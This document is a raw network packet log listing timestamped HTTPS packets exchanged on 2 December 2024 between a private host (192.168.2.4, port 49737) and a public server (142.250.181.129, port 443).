Dec 2, 2024 16:15:00.274113894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.281692028 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.281749010 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.283023119 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.283068895 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.290968895 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.291018963 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.292289019 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.292337894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.296849012 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.296896935 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.301301956 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.301350117 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.307419062 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.307465076 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.315643072 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.315710068 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.318380117 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.318427086 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.328713894 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.328767061 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.331821918 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.331870079 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.342190981 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.342240095 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.345299006 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.345345020 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.355839968 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.355918884 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.358879089 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.358932972 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.369292974 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.369343042 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.369437933 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.369482994 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.382846117 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.382905960 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.422883987 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.422950029 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.422957897 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.423006058 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.456186056 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.456247091 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.456310987 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.456387043 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.458349943 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.458523989 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.462687969 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.462759972 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.462766886 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.462807894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.466902018 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.466952085 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.467046022 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.467094898 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.471283913 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.471339941 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.471446037 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.471489906 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.471497059 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.471541882 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.475430965 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.475478888 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.475536108 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.475578070 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.480771065 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.480820894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.480978012 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.481019974 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.488339901 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.488390923 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.488558054 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.488610029 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.498347998 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.498408079 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.498413086 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.498456955 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.508694887 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.508766890 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.508826017 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.508867025 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.518774986 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.518836975 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.518884897 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.518929005 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.528523922 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.528577089 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.528803110 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.528853893 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.538587093 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.538649082 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.538755894 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.538805962 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.547996044 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.548047066 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.548110962 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.548163891 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.557497025 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.557566881 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.557611942 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.557662010 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.576426029 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.576472044 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.576562881 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.576603889 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.577975988 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.578032017 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.578131914 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.578176022 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.578180075 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.578218937 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.580519915 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.580564976 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.583187103 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.583240032 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.584414959 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.584465027 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.591531038 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.591579914 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.592653990 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.592699051 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.597758055 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.597801924 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.598942995 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.598994017 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.604011059 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.604055882 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.605148077 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.605206966 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.624254942 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.624301910 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.625515938 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.625566006 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.625571012 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.625608921 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.628789902 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.628838062 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.657442093 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.657505989 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.658190966 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.658232927 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.660698891 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.660779953 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.660804987 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.660849094 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.663291931 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.663345098 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.663352013 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.663398981 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.665802002 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.665859938 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.665999889 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.666043997 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.668412924 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.668459892 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.670905113 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.670953989 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.670974016 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.671016932 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.673588037 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.673645020 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.674684048 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.674725056 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.674832106 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.674870014 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.677082062 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.677130938 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.677174091 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.677217960 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.680104971 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.680155993 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.680186987 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.680253029 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.682408094 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.682459116 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.684322119 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.684374094 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.689651966 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.689712048 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.689785004 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.689824104 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.690850019 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.690938950 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.692671061 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.692719936 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.699474096 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.699522018 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.699577093 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.699621916 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.700834990 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.700881958 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.704220057 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.704267025 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.709949017 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.709995031 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.710001945 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.710073948 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.710850954 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.710902929 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.714219093 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.714271069 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.719793081 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.719852924 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.719923973 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.719969034 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.719975948 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.720021963 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.720863104 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.720916033 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.723131895 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.723196983 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.730087042 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.730150938 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.730221987 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.730262041 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.731197119 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.731239080 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.732646942 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.732691050 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.739944935 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.740011930 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.740031004 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.740075111 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.741024017 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.741067886 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.742580891 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.742633104 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.749114990 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.749166965 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.749352932 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.749391079 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.750169992 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.750207901 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.751699924 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.751753092 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.758354902 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.758410931 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.758423090 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.758460999 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.759299994 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.759342909 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.760890961 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.760936022 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.767667055 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.767733097 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.767746925 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.767781973 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.768496990 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.768537045 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.770056009 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.770101070 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.775984049 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.776040077 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.776077986 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.776113033 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.776977062 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.777018070 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.778486967 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.778537989 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.784758091 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.784811974 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.784869909 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.784919024 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.785794020 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.785837889 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.788324118 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.788369894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.792705059 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.792751074 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.792784929 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.792824030 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.793709993 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.793751001 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.795880079 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.795923948 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.798959017 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.799005985 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.799042940 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.799088001 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.799902916 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.799941063 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.801390886 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.801434040 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.805138111 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.805186987 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.805214882 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.805250883 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.806020975 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.806066036 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.807786942 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.807832956 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.825453043 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.825536966 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.825546980 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.825584888 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.826071024 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.826112986 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.826158047 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.826205015 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.827620029 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.827667952 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.827698946 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.827738047 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.829157114 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.829195976 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.829973936 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.830018044 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.830049038 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.830086946 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.858843088 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.858927965 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.859344006 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.859395981 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.859572887 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.859616041 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.860438108 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.860479116 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.860510111 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.860560894 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.861926079 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.861975908 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.863401890 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.863441944 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.863468885 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.863511086 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.864758015 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.864804983 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.864845037 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.864881992 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.866177082 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.866214037 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.866324902 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.866369963 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.867513895 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.867554903 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.868781090 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.868827105 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.868891954 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.868932962 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.870147943 CET	443	49737	142.250.181.129	192.168.2.4
